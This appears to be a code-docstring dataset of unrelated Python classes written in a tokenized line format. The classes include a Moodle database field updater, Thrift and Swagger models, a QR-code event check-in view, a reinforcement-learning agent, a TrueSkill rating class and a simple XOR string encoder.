class UpdateField(MoodleDBSession): <NEW_LINE> <INDENT> def __init__(self, database_name, field_name): <NEW_LINE> <INDENT> super().__init__() <NEW_LINE> self.field_name = field_name <NEW_LINE> with self.DBSession() as session: <NEW_LINE> <INDENT> DataFields = self.table_string_to_class('data_fields') <NEW_LINE> Data = self.table_string_to_class('data') <NEW_LINE> statement = session.query(DataFields).select_from(Data). join(DataFields, self.and_( Data.name==database_name, Data.id == DataFields.dataid, DataFields.name == field_name ) ) <NEW_LINE> <DEDENT> self.target = statement.one() <NEW_LINE> self.target_id = self.target.id <NEW_LINE> <DEDENT> def update_menu(self, value): <NEW_LINE> <INDENT> if self.target_id is None: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> if isinstance(value, list): <NEW_LINE> <INDENT> value = "\r\n".join(value) <NEW_LINE> <DEDENT> self.update_table('data_fields', where=dict(id=self.target_id), param1=value) | Class that is used to update a field in a database module | 62599087e1aae11d1e7cf5dc |
class CassandraKeyspaceResource(msrest.serialization.Model): <NEW_LINE> <INDENT> _validation = { 'id': {'required': True}, } <NEW_LINE> _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, } <NEW_LINE> def __init__( self, **kwargs ): <NEW_LINE> <INDENT> super(CassandraKeyspaceResource, self).__init__(**kwargs) <NEW_LINE> self.id = kwargs['id'] | Cosmos DB Cassandra keyspace resource object.
All required parameters must be populated in order to send to Azure.
:param id: Required. Name of the Cosmos DB Cassandra keyspace.
:type id: str | 625990878a349b6b43687df0 |
class RHTicketConfigQRCodeImage(RHManageRegFormBase): <NEW_LINE> <INDENT> def _process(self): <NEW_LINE> <INDENT> qr = qrcode.QRCode( version=6, error_correction=qrcode.constants.ERROR_CORRECT_M, box_size=4, border=1 ) <NEW_LINE> checkin_app = OAuthApplication.find_one(system_app_type=SystemAppType.checkin) <NEW_LINE> qr_data = { "event_id": self.event.id, "title": self.event.title, "date": self.event.start_dt.isoformat(), "version": 1, "server": { "base_url": config.BASE_URL, "consumer_key": checkin_app.client_id, "auth_url": url_for('oauth.oauth_authorize', _external=True), "token_url": url_for('oauth.oauth_token', _external=True) } } <NEW_LINE> json_qr_data = json.dumps(qr_data) <NEW_LINE> qr.add_data(json_qr_data) <NEW_LINE> qr.make(fit=True) <NEW_LINE> qr_img = qr.make_image() <NEW_LINE> output = BytesIO() <NEW_LINE> qr_img.save(output) <NEW_LINE> output.seek(0) <NEW_LINE> return send_file('config.png', output, 'image/png') | Display configuration QRCode. | 62599087ec188e330fdfa43f |
class my_error(Exception): <NEW_LINE> <INDENT> def __init__(self, msg): <NEW_LINE> <INDENT> self.msg = msg | My own exception class
Attributes :
msg -- explanation of the error | 625990877047854f46340f47 |
class XorEncoder(object): <NEW_LINE> <INDENT> def encode(self,data,key): <NEW_LINE> <INDENT> if len(data) % len(key) != 0: <NEW_LINE> <INDENT> raise "Data length must be a multiple of key length" <NEW_LINE> <DEDENT> key_idx=0 <NEW_LINE> xor_data="" <NEW_LINE> for x in range(len(data)): <NEW_LINE> <INDENT> xor_data=xor_data+chr(ord(data[x]) ^ ord(key[key_idx])) <NEW_LINE> key_idx=(key_idx + 1) % len(key) <NEW_LINE> <DEDENT> return xor_data | Base class for architecture-specific XOR encoders. Provides self.encode(). | 62599087aad79263cf43034c |
class GetLatestDocumentsTestCase(TestCase): <NEW_LINE> <INDENT> longMessage = True <NEW_LINE> def test_tag(self): <NEW_LINE> <INDENT> baker.make('document_library.DocumentTranslation', language_code='en', is_published=True) <NEW_LINE> baker.make('document_library.DocumentTranslation', language_code='en', is_published=True) <NEW_LINE> baker.make('document_library.DocumentTranslation', language_code='en', is_published=True) <NEW_LINE> baker.make('document_library.DocumentTranslation', language_code='en', is_published=False) <NEW_LINE> req = RequestFactory().get('/') <NEW_LINE> req.LANGUAGE_CODE = 'en' <NEW_LINE> context = RequestContext(req) <NEW_LINE> result = document_library_tags.get_latest_documents(context) <NEW_LINE> self.assertEqual(result.count(), 3, msg=( 'Should return up to five published documents')) <NEW_LINE> result = document_library_tags.get_latest_documents(context, count=2) <NEW_LINE> self.assertEqual(result.count(), 2, msg=( 'Should return the requested number of published documents')) | Tests for the ``get_latest_documents`` tamplatetag. | 6259908797e22403b383ca8a |
class getSquareChatAnnouncements_result(object): <NEW_LINE> <INDENT> def __init__(self, success=None, e=None,): <NEW_LINE> <INDENT> self.success = success <NEW_LINE> self.e = e <NEW_LINE> <DEDENT> def read(self, iprot): <NEW_LINE> <INDENT> if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None: <NEW_LINE> <INDENT> iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec]) <NEW_LINE> return <NEW_LINE> <DEDENT> iprot.readStructBegin() <NEW_LINE> while True: <NEW_LINE> <INDENT> (fname, ftype, fid) = iprot.readFieldBegin() <NEW_LINE> if ftype == TType.STOP: <NEW_LINE> <INDENT> break <NEW_LINE> <DEDENT> if fid == 0: <NEW_LINE> <INDENT> if ftype == TType.STRUCT: <NEW_LINE> <INDENT> self.success = GetSquareChatAnnouncementsResponse() <NEW_LINE> self.success.read(iprot) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> iprot.skip(ftype) <NEW_LINE> <DEDENT> <DEDENT> elif fid == 1: <NEW_LINE> <INDENT> if ftype == TType.STRUCT: <NEW_LINE> <INDENT> self.e = SquareException() <NEW_LINE> self.e.read(iprot) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> iprot.skip(ftype) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> iprot.skip(ftype) <NEW_LINE> <DEDENT> iprot.readFieldEnd() <NEW_LINE> <DEDENT> iprot.readStructEnd() <NEW_LINE> <DEDENT> def write(self, oprot): <NEW_LINE> <INDENT> if oprot._fast_encode is not None and self.thrift_spec is not None: <NEW_LINE> <INDENT> oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec])) <NEW_LINE> return <NEW_LINE> <DEDENT> oprot.writeStructBegin('getSquareChatAnnouncements_result') <NEW_LINE> if self.success is not None: <NEW_LINE> <INDENT> oprot.writeFieldBegin('success', TType.STRUCT, 0) <NEW_LINE> self.success.write(oprot) <NEW_LINE> oprot.writeFieldEnd() <NEW_LINE> <DEDENT> if self.e is not None: <NEW_LINE> <INDENT> oprot.writeFieldBegin('e', TType.STRUCT, 1) <NEW_LINE> self.e.write(oprot) <NEW_LINE> oprot.writeFieldEnd() <NEW_LINE> <DEDENT> oprot.writeFieldStop() <NEW_LINE> oprot.writeStructEnd() <NEW_LINE> <DEDENT> def validate(self): <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] <NEW_LINE> return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) <NEW_LINE> <DEDENT> def __eq__(self, other): <NEW_LINE> <INDENT> return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ <NEW_LINE> <DEDENT> def __ne__(self, other): <NEW_LINE> <INDENT> return not (self == other) | Attributes:
- success
- e | 62599087dc8b845886d5514c |
@Wrapper.register("reptile") <NEW_LINE> class ReptileWrapper(_FOWrapper): <NEW_LINE> <INDENT> _all_grads = True <NEW_LINE> def __init__( self, model: Model, meta_optimizer: torch.optim.Optimizer, optimizer_cls: str, optimizer_kwargs: Dict[str, Any], grad_norm: Optional[float] = None, grad_clipping: Optional[float] = None, update_hook: Callable = None, inherit: bool = False, loss_ratios_per_step: List[Dict[str, int]] = None, ): <NEW_LINE> <INDENT> super(ReptileWrapper, self).__init__( model=model, meta_optimizer=meta_optimizer, optimizer_cls=optimizer_cls, optimizer_kwargs=optimizer_kwargs, grad_norm=grad_norm, grad_clipping=grad_clipping, update_hook=update_hook, inherit=inherit, loss_ratios_per_step=loss_ratios_per_step, ) <NEW_LINE> trainable_params = filter(lambda p: p.requires_grad, self._container.parameters()) <NEW_LINE> self.optimizer = self.optimizer_cls( trainable_params, **self.optimizer_kwargs) | Wrapper for Reptile.
Arguments:
model (nn.Module): classifier.
optimizer_cls: optimizer class.
meta_optimizer_cls: meta optimizer class.
optimizer_kwargs (dict): kwargs to pass to optimizer upon construction.
meta_optimizer_kwargs (dict): kwargs to pass to meta optimizer upon construction. | 62599087091ae356687067d5 |
class MassExportItemsDialog(MassSelectItemsDialog): <NEW_LINE> <INDENT> data_submitted = Signal(object) <NEW_LINE> def __init__(self, parent, db_mngr, *db_maps): <NEW_LINE> <INDENT> super().__init__(parent, db_mngr, *db_maps) <NEW_LINE> self.setWindowTitle("Export items") <NEW_LINE> <DEDENT> def accept(self): <NEW_LINE> <INDENT> super().accept() <NEW_LINE> db_map_items_for_export = { db_map: [item_type for item_type, check_box in self.item_check_boxes.items() if check_box.isChecked()] for db_map, check_box in self.db_map_check_boxes.items() if check_box.isChecked() } <NEW_LINE> self.data_submitted.emit(db_map_items_for_export) | A dialog to let users chose items for JSON export. | 62599087ec188e330fdfa441 |
class PublisherViewSet(viewsets.ModelViewSet): <NEW_LINE> <INDENT> serializer_class = PublisherSerializer <NEW_LINE> queryset = Publisher.objects.all() | ViewSet for Publishers | 625990872c8b7c6e89bd537a |
class RuleArray(object): <NEW_LINE> <INDENT> def __init__(self, rules=None): <NEW_LINE> <INDENT> self.swagger_types = { 'rules': 'list[OutputRule]' } <NEW_LINE> self.attribute_map = { 'rules': 'rules' } <NEW_LINE> self._rules = rules <NEW_LINE> <DEDENT> @property <NEW_LINE> def rules(self): <NEW_LINE> <INDENT> return self._rules <NEW_LINE> <DEDENT> @rules.setter <NEW_LINE> def rules(self, rules): <NEW_LINE> <INDENT> self._rules = rules <NEW_LINE> <DEDENT> def to_dict(self): <NEW_LINE> <INDENT> result = {} <NEW_LINE> for attr, _ in iteritems(self.swagger_types): <NEW_LINE> <INDENT> value = getattr(self, attr) <NEW_LINE> if isinstance(value, list): <NEW_LINE> <INDENT> result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) <NEW_LINE> <DEDENT> elif hasattr(value, "to_dict"): <NEW_LINE> <INDENT> result[attr] = value.to_dict() <NEW_LINE> <DEDENT> elif isinstance(value, dict): <NEW_LINE> <INDENT> result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> result[attr] = value <NEW_LINE> <DEDENT> <DEDENT> return result <NEW_LINE> <DEDENT> def to_str(self): <NEW_LINE> <INDENT> return pformat(self.to_dict()) <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return self.to_str() <NEW_LINE> <DEDENT> def __eq__(self, other): <NEW_LINE> <INDENT> if not isinstance(other, RuleArray): <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> return self.__dict__ == other.__dict__ <NEW_LINE> <DEDENT> def __ne__(self, other): <NEW_LINE> <INDENT> return not self == other | NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually. | 6259908771ff763f4b5e9342 |
class ModelRelationshipModification(BaseModel): <NEW_LINE> <INDENT> operation = SmallIntegerField( validators=[MinValueValidator(-1), MaxValueValidator(1)], null=True, choices=DjangoOperations, ) <NEW_LINE> field = ForeignKey(ModelField, on_delete=CASCADE) <NEW_LINE> entry = ForeignKey(ModelEntry, on_delete=CASCADE) <NEW_LINE> event = ForeignKey(ModelEvent, on_delete=CASCADE, related_name='relationships') <NEW_LINE> class Meta: <NEW_LINE> <INDENT> verbose_name = "Model Entry Event Relationship Modification" <NEW_LINE> verbose_name_plural = "Model Entry Event Relationship Modifications" <NEW_LINE> <DEDENT> class LoggingIgnore: <NEW_LINE> <INDENT> complete = True <NEW_LINE> <DEDENT> def __str__(self) -> str: <NEW_LINE> <INDENT> operation = Operation(self.operation) <NEW_LINE> past = {v: k for k, v in PastM2MOperationMap.items()}[operation] <NEW_LINE> return ( f'[{self.field.mirror.application}:' f'{self.field.mirror.name}:' f'{self.field.name}] ' f'{past} {self.entry}' ) <NEW_LINE> <DEDENT> def short(self) -> str: <NEW_LINE> <INDENT> operation = Operation(self.operation) <NEW_LINE> shorthand = {v: k for k, v in ShortOperationMap.items()}[operation] <NEW_LINE> return f'{shorthand}{self.entry.short()}' <NEW_LINE> <DEDENT> def medium(self) -> [str, str]: <NEW_LINE> <INDENT> operation = Operation(self.operation) <NEW_LINE> shorthand = {v: k for k, v in ShortOperationMap.items()}[operation] <NEW_LINE> return f'{shorthand}{self.field.name}', f'{self.entry.short()}' | Used to record the model entry even modifications of relationships. (M2M, Foreign)
The operation attribute can have 4 valid values:
-1 (delete), 0 (modify), 1 (create), None (n/a)
field is the field where the relationship changed (entry got added or removed)
and model is the entry that got removed/added from the relationship. | 62599087fff4ab517ebcf3ab |
class ICountryportlet(IPortletDataProvider): <NEW_LINE> <INDENT> pass | Define your portlet schema here | 6259908763b5f9789fe86cfe |
class PolicyGradientAgent(LearningAgent): <NEW_LINE> <INDENT> def __init__(self, module, learner = None): <NEW_LINE> <INDENT> assert isinstance(module, FeedForwardNetwork) <NEW_LINE> assert len(module.outmodules) == 1 <NEW_LINE> LearningAgent.__init__(self, module, learner) <NEW_LINE> self.explorationlayer = GaussianLayer(self.outdim, name='gauss') <NEW_LINE> self.explorationlayer.setSigma([-2] * self.outdim) <NEW_LINE> out = self.module.outmodules.pop() <NEW_LINE> self.module.addOutputModule(self.explorationlayer) <NEW_LINE> self.module.addConnection(IdentityConnection(out, self.module['gauss'])) <NEW_LINE> self.module.sortModules() <NEW_LINE> self.learner.setModule(self.module) <NEW_LINE> self.history.addField('loglh', self.module.paramdim) <NEW_LINE> self.history.link.append('loglh') <NEW_LINE> self.loglh = None <NEW_LINE> <DEDENT> def enableLearning(self): <NEW_LINE> <INDENT> LearningAgent.enableLearning(self) <NEW_LINE> self.explorationlayer.enabled = True <NEW_LINE> <DEDENT> def disableLearning(self): <NEW_LINE> <INDENT> LearningAgent.disableLearning(self) <NEW_LINE> self.explorationlayer.enabled = False <NEW_LINE> <DEDENT> def setSigma(self, sigma): <NEW_LINE> <INDENT> assert len(sigma) == self.explorationlayer.paramdim <NEW_LINE> self.explorationlayer._setParameters(sigma, self.module) <NEW_LINE> <DEDENT> def getSigma(self): <NEW_LINE> <INDENT> return self.explorationlayer.params <NEW_LINE> <DEDENT> def setParameters(self, params): <NEW_LINE> <INDENT> self.module._setParameters(params) <NEW_LINE> self.learner.setModule(self.module) <NEW_LINE> <DEDENT> def getAction(self): <NEW_LINE> <INDENT> HistoryAgent.getAction(self) <NEW_LINE> self.lastaction = self.module.activate(self.lastobs).copy() <NEW_LINE> self.module.backward() <NEW_LINE> self.loglh = self.module.derivs.copy() <NEW_LINE> d = self.module.derivs <NEW_LINE> d *= 0 <NEW_LINE> self.module.reset() <NEW_LINE> return self.lastaction <NEW_LINE> <DEDENT> def giveReward(self, r): <NEW_LINE> <INDENT> assert self.lastobs != None <NEW_LINE> assert self.lastaction != None <NEW_LINE> if self.remember: <NEW_LINE> <INDENT> self.history.appendLinked(self.lastobs, self.lastaction, r, self.loglh) <NEW_LINE> <DEDENT> self.lastobs = None <NEW_LINE> self.lastaction = None | PolicyGradientAgent is a learning agent, that adds a GaussianLayer to
its module and stores the log likelihoods (loglh) in the dataset. It is used
for rllearners like enac, reinforce, gpomdp, ... | 6259908726068e7796d4e4d8 |
class BaseDownloadWorker(object): <NEW_LINE> <INDENT> def process(self, request): <NEW_LINE> <INDENT> raise NotImplementedError() | Download worker interface | 625990873346ee7daa33842d |
class TCol: <NEW_LINE> <INDENT> B = '\033[1m' <NEW_LINE> RB = '\033[21m' <NEW_LINE> RE = '\033[91m' <NEW_LINE> GR = '\033[92m' <NEW_LINE> BL = '\033[94m' <NEW_LINE> ST = '\033[0m' | Classe pour les escape sequence de couleurs | 62599087e1aae11d1e7cf5de |
class NotebookTab: <NEW_LINE> <INDENT> @make_thread_safe <NEW_LINE> def __init__(self, widget, **kwargs): <NEW_LINE> <INDENT> if not isinstance(widget.parent, Notebook): <NEW_LINE> <INDENT> raise ValueError("widgets of NotebookTabs must be child widgets " "of a Notebook, but %r is a child widget of %r" % (widget, widget.parent)) <NEW_LINE> <DEDENT> if widget in widget.parent._tab_objects: <NEW_LINE> <INDENT> raise RuntimeError("there is already a NotebookTab of %r" % (widget,)) <NEW_LINE> <DEDENT> self.widget = widget <NEW_LINE> self.config = TabConfigDict(self) <NEW_LINE> self.initial_options = kwargs <NEW_LINE> widget.parent._tab_objects[widget] = self <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> item_reprs = ['%s=%r' % pair for pair in self.initial_options.items()] <NEW_LINE> return '%s(%s)' % ( type(self).__name__, ', '.join([repr(self.widget)] + item_reprs)) <NEW_LINE> <DEDENT> def _check_in_notebook(self): <NEW_LINE> <INDENT> if self not in self.widget.parent: <NEW_LINE> <INDENT> raise RuntimeError("the tab is not in the notebook yet") <NEW_LINE> <DEDENT> <DEDENT> def hide(self): <NEW_LINE> <INDENT> self._check_in_notebook() <NEW_LINE> self.widget.parent._call(None, self.widget.parent, 'hide', self.widget) <NEW_LINE> <DEDENT> def unhide(self): <NEW_LINE> <INDENT> self._check_in_notebook() <NEW_LINE> self.widget.parent._call(None, self.widget.parent, 'add', self.widget) | Represents a tab that is in a notebook, or is ready to be added to a
notebook.
The *widget* must be a child widget of a :class:`.Notebook` widget. Each
:class:`.NotebookTab` belongs to the widget's parent notebook; for example,
if you create a tab like this...
::
tab = teek.NotebookTab(teek.Label(asd_notebook, "hello"))
...then the tab cannot be added to any other notebook widget than
``asd_notebook``, because ``asd_notebook`` is the parent widget of the
label.
Most methods raise :exc:`RuntimeError` if the tab has not been added to the
notebook yet. This includes doing pretty much anything with :attr:`config`.
For convenience, options can be passed when creating a
:class:`.NotebookTab`, so that this...
::
notebook.append(teek.NotebookTab(some_widget, text="Tab Title"))
...does the same thing as this::
tab = teek.NotebookTab(some_widget, text="Tab Title")
notebook.append(tab)
tab.config['text'] = "Tab Title"
There are never multiple :class:`NotebookTab` objects that represent the
same tab.
.. attribute:: config
Similar to the ``config`` attribute that widgets have. The available
options are documented as ``TAB OPTIONS`` in :man:`ttk_notebook(3tk)`.
Attempting to use this raises :exc:`RuntimeError` if the tab hasn't
been added to the notebook yet.
.. attribute:: widget
This attribute and initialization argument is the widget in the tab. It
should be a child widget of the notebook. Use ``tab.widget.parent`` to
access the :class:`.Notebook` that the tab belongs to.
.. attribute:: initial_options
A dict of keyword arguments passed to NotebookTab. When the tab is
added to the notebook for the first time, :attr:`.config` is updated
from this dict. | 6259908750812a4eaa621990 |
class DeclarationGroupNode(NonValuedExpressionNode): <NEW_LINE> <INDENT> def _get_declarations(self): <NEW_LINE> <INDENT> return self._declarations <NEW_LINE> <DEDENT> declarations = property(_get_declarations) <NEW_LINE> def __init__(self): <NEW_LINE> <INDENT> super(DeclarationGroupNode, self).__init__() <NEW_LINE> self._declarations = [] <NEW_LINE> <DEDENT> def collect_definitions(self, scope, errors): <NEW_LINE> <INDENT> raise NotImplementedError() <NEW_LINE> <DEDENT> def generate_dot(self, generator): <NEW_LINE> <INDENT> me = generator.add_node(str(self.__class__.__name__)) <NEW_LINE> for declaration in self.declarations: <NEW_LINE> <INDENT> declaration = declaration.generate_dot(generator) <NEW_LINE> generator.add_edge(me, declaration) <NEW_LINE> <DEDENT> return me | Clase C{DeclarationGroupNode} del árbol de sintáxis abstracta.
Este nodo del árbol de sintáxis abstracta es la clase base de los
nodos C{TypeDeclarationGroupNode} y C{FunctionDeclarationGroupNode},
los cuales representan un grupo de declaraciones consecutivas de tipos
o funciones respectivamente. En nodos tienen el objetivo de garantizar
durante la comprobación semántica que no se hagan declaraciones de
variables entre declaraciones de tipos o funciones mutuamente recursivas
ya que si esto sucede se producen situaciones ambiguas. | 625990873617ad0b5ee07ce7 |
class PassThrough(ExplicitComponent): <NEW_LINE> <INDENT> def __init__(self, i_var, o_var, val, units=None): <NEW_LINE> <INDENT> super(PassThrough, self).__init__() <NEW_LINE> self.i_var = i_var <NEW_LINE> self.o_var = o_var <NEW_LINE> self.units = units <NEW_LINE> self.val = val <NEW_LINE> if isinstance(val, (float, int)) or np.isscalar(val): <NEW_LINE> <INDENT> size = 1 <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> size = np.prod(val.shape) <NEW_LINE> <DEDENT> self.size = size <NEW_LINE> <DEDENT> def setup(self): <NEW_LINE> <INDENT> if self.units is None: <NEW_LINE> <INDENT> self.add_input(self.i_var, self.val) <NEW_LINE> self.add_output(self.o_var, self.val) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.add_input(self.i_var, self.val, units=self.units) <NEW_LINE> self.add_output(self.o_var, self.val, units=self.units) <NEW_LINE> <DEDENT> row_col = np.arange(self.size) <NEW_LINE> self.declare_partials(of=self.o_var, wrt=self.i_var, val=1, rows=row_col, cols=row_col) <NEW_LINE> <DEDENT> def compute(self, inputs, outputs): <NEW_LINE> <INDENT> outputs[self.o_var] = inputs[self.i_var] <NEW_LINE> <DEDENT> def linearize(self, inputs, outputs, J): <NEW_LINE> <INDENT> pass | Helper component that is needed when variables must be passed
directly from input to output | 6259908771ff763f4b5e9344 |
class TreeNode: <NEW_LINE> <INDENT> def __init__(self, data): <NEW_LINE> <INDENT> self.data = data <NEW_LINE> self.left = None <NEW_LINE> self.right = None <NEW_LINE> self.parent = None | Node with left and right children | 6259908799fddb7c1ca63ba7 |
class UsuarioGestionForm(forms.ModelForm): <NEW_LINE> <INDENT> username = forms.RegexField( label=("Nombre de usuario"), max_length=30, regex=r"^[\w.@+-]+$", help_text=("Required. 30 characters or fewer. Letters, digits and " "@/./+/-/_ only."), error_messages={ 'invalid': ("This value may contain only letters, numbers and " "@/./+/-/_ characters.")}) <NEW_LINE> password = ReadOnlyPasswordHashField(label=("Contraseña"), help_text=("Las contraseñas no se almacenan en bruto, así que no hay manera de ver la contraseña del usuario," " pero se puede cambiar mediante <a href=\"password/\">este formulario</a>. ")) <NEW_LINE> class Meta: <NEW_LINE> <INDENT> model = User <NEW_LINE> fields = ('username', 'password', 'email', 'first_name', 'last_name', 'telefono', 'direccion') <NEW_LINE> fieldsets = [ ( None, {'fields': ['username', 'password']}), ('Informacion personal', {'fields': ['email', 'first_name', 'last_name', 'telefono', 'direccion'], 'classes': ['collapse']}), ] <NEW_LINE> <DEDENT> def __init__(self, *args, **kwargs): <NEW_LINE> <INDENT> super(UsuarioGestionForm, self).__init__(*args, **kwargs) <NEW_LINE> f = self.fields.get('user_permissions', None) <NEW_LINE> if f is not None: <NEW_LINE> <INDENT> f.queryset = f.queryset.select_related('content_type') <NEW_LINE> <DEDENT> <DEDENT> def clean_password(self): <NEW_LINE> <INDENT> return self.initial["password"] <NEW_LINE> <DEDENT> widgets = {} | Formluario para la modificacion de usuarios
Hereda de forms.ModelForm y utiliza la clase user para
agregar ciertos campos a la hora de la modificacion | 6259908726068e7796d4e4da |
class Clusters(ListModel): <NEW_LINE> <INDENT> _attribute_map = { 'clusters': {'type': list}, } <NEW_LINE> _attribute_defaults = {'clusters': []} <NEW_LINE> _list_attr = 'clusters' <NEW_LINE> _list_class = Cluster | Representation of a group of one or more Clusters. | 62599087099cdd3c636761c6 |
class Server(object): <NEW_LINE> <INDENT> def __init__(self, port, service_info): <NEW_LINE> <INDENT> global monitoring_info <NEW_LINE> monitoring_info = service_info <NEW_LINE> self.__server = SocketServer.TCPServer(('', port), RequestHandler) <NEW_LINE> <DEDENT> def start(self): <NEW_LINE> <INDENT> self.__server.serve_forever() <NEW_LINE> <DEDENT> def start_async(self): <NEW_LINE> <INDENT> server_thread = Thread(target=self.start) <NEW_LINE> server_thread.start() | HTTP server to get monitoring info.
| 6259908792d797404e389928 |
class MonsterFlairCondition(EventCondition): <NEW_LINE> <INDENT> name = "monster_flair" <NEW_LINE> def test(self, session: Session, condition: MapCondition) -> bool: <NEW_LINE> <INDENT> slot = int(condition.parameters[0]) <NEW_LINE> category = condition.parameters[1] <NEW_LINE> name = condition.parameters[2] <NEW_LINE> monster = session.player.monsters[slot] <NEW_LINE> try: <NEW_LINE> <INDENT> return monster.flairs[category].name == name <NEW_LINE> <DEDENT> except KeyError: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> return False | Check to see if the given monster flair matches the expected value.
Script usage:
.. code-block::
is monster_flair <slot>,<category>,<name>
Script parameters:
slot: Position of the monster in the player monster list.
category: Category of the flair.
name: Name of the flair. | 625990872c8b7c6e89bd537e |
class Statistics: <NEW_LINE> <INDENT> def __init__(self, save_path: Path = DEFAULT_SAVE_PATH) -> None: <NEW_LINE> <INDENT> assert isinstance(save_path, Path) <NEW_LINE> self.save_path = save_path <NEW_LINE> self._load_data() <NEW_LINE> self.env = TrueSkill() <NEW_LINE> backends.choose_backend("scipy") <NEW_LINE> <DEDENT> def save(self, ranking: Optional[List[str]] = None) -> None: <NEW_LINE> <INDENT> if ranking: <NEW_LINE> <INDENT> assert isinstance(ranking, list) <NEW_LINE> assert isinstance(ranking[0], str) <NEW_LINE> self.data.all_rankings.append(ranking) <NEW_LINE> <DEDENT> self._save_data() <NEW_LINE> <DEDENT> @property <NEW_LINE> def all_players(self) -> Set[str]: <NEW_LINE> <INDENT> return {name for ranking in self.data.all_rankings for name in ranking} <NEW_LINE> <DEDENT> def true_skill(self) -> Dict[str, Rating]: <NEW_LINE> <INDENT> rankings = {name: self.env.create_rating() for name in self.all_players} <NEW_LINE> for game in self.data.all_rankings: <NEW_LINE> <INDENT> rating_groups = [[rankings[name]] for name in game] <NEW_LINE> ranks = list(range(len(game))) <NEW_LINE> ratings = self.env.rate(rating_groups=rating_groups, ranks=ranks) <NEW_LINE> for name, ranking in zip(game, ratings): <NEW_LINE> <INDENT> rankings[name] = ranking[0] <NEW_LINE> <DEDENT> <DEDENT> sorted_rankings = sorted( rankings.items(), key=lambda r: self.env.expose(r[1]), reverse=True ) <NEW_LINE> return dict(sorted_rankings) <NEW_LINE> <DEDENT> def win_probability(self, players: List[str]) -> Dict[str, float]: <NEW_LINE> <INDENT> if len(players) != 2: <NEW_LINE> <INDENT> raise NotImplementedError( "Win probability is only implemented for two players." ) <NEW_LINE> <DEDENT> true_skills = self.true_skill() <NEW_LINE> player_1 = true_skills.get(players[0], Rating()) <NEW_LINE> player_2 = true_skills.get(players[1], Rating()) <NEW_LINE> draw_probability = quality_1vs1(player_1, player_2) <NEW_LINE> delta_mu = player_1.mu - player_2.mu <NEW_LINE> denominator = np.sqrt(player_1.sigma ** 2 + player_2.sigma ** 2) <NEW_LINE> player_1_win_chance = self.env.cdf(delta_mu / denominator) <NEW_LINE> player_2_win_chance = 1 - player_1_win_chance <NEW_LINE> return { "draw": draw_probability, "player_1": player_1_win_chance, "player_2": player_2_win_chance, } <NEW_LINE> <DEDENT> def _load_data(self) -> None: <NEW_LINE> <INDENT> assert self.save_path.is_absolute() <NEW_LINE> self.save_path.parent.mkdir(parents=True, exist_ok=True) <NEW_LINE> if not self.save_path.exists(): <NEW_LINE> <INDENT> self.save_path.touch() <NEW_LINE> self.data = Data() <NEW_LINE> self._save_data() <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.data = pickle.loads(self.save_path.read_bytes()) <NEW_LINE> <DEDENT> <DEDENT> def _save_data(self) -> None: <NEW_LINE> <INDENT> self.save_path.write_bytes( data=pickle.dumps(self.data, protocol=pickle.HIGHEST_PROTOCOL) ) | Class for saving and retrieval of statistics.
This is the main class of this module, and this is considered the public
API. | 6259908797e22403b383ca90 |
class InvalidProtocol(ZmailException, ValueError): <NEW_LINE> <INDENT> pass | Invalid protocol settings used. | 62599087d8ef3951e32c8c2a |
class CoverageConfig(EnvironmentConfig): <NEW_LINE> <INDENT> def __init__(self, args): <NEW_LINE> <INDENT> super(CoverageConfig, self).__init__(args, 'coverage') <NEW_LINE> self.group_by = frozenset(args.group_by) if 'group_by' in args and args.group_by else set() <NEW_LINE> self.all = args.all if 'all' in args else False <NEW_LINE> self.stub = args.stub if 'stub' in args else False <NEW_LINE> self.coverage = False | Configuration for the coverage command. | 6259908760cbc95b06365b38 |
class ClassParticleEdit(Operator): <NEW_LINE> <INDENT> bl_idname = "class.pieparticleedit" <NEW_LINE> bl_label = "Class Particle Edit" <NEW_LINE> bl_options = {'REGISTER', 'UNDO'} <NEW_LINE> bl_description = "Particle Edit (must have active particle system)" <NEW_LINE> def execute(self, context): <NEW_LINE> <INDENT> if context.object.mode == "EDIT": <NEW_LINE> <INDENT> bpy.ops.object.mode_set(mode="OBJECT") <NEW_LINE> bpy.ops.particle.particle_edit_toggle() <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> bpy.ops.particle.particle_edit_toggle() <NEW_LINE> <DEDENT> return {'FINISHED'} | Particle Edit | 62599087656771135c48adfd |
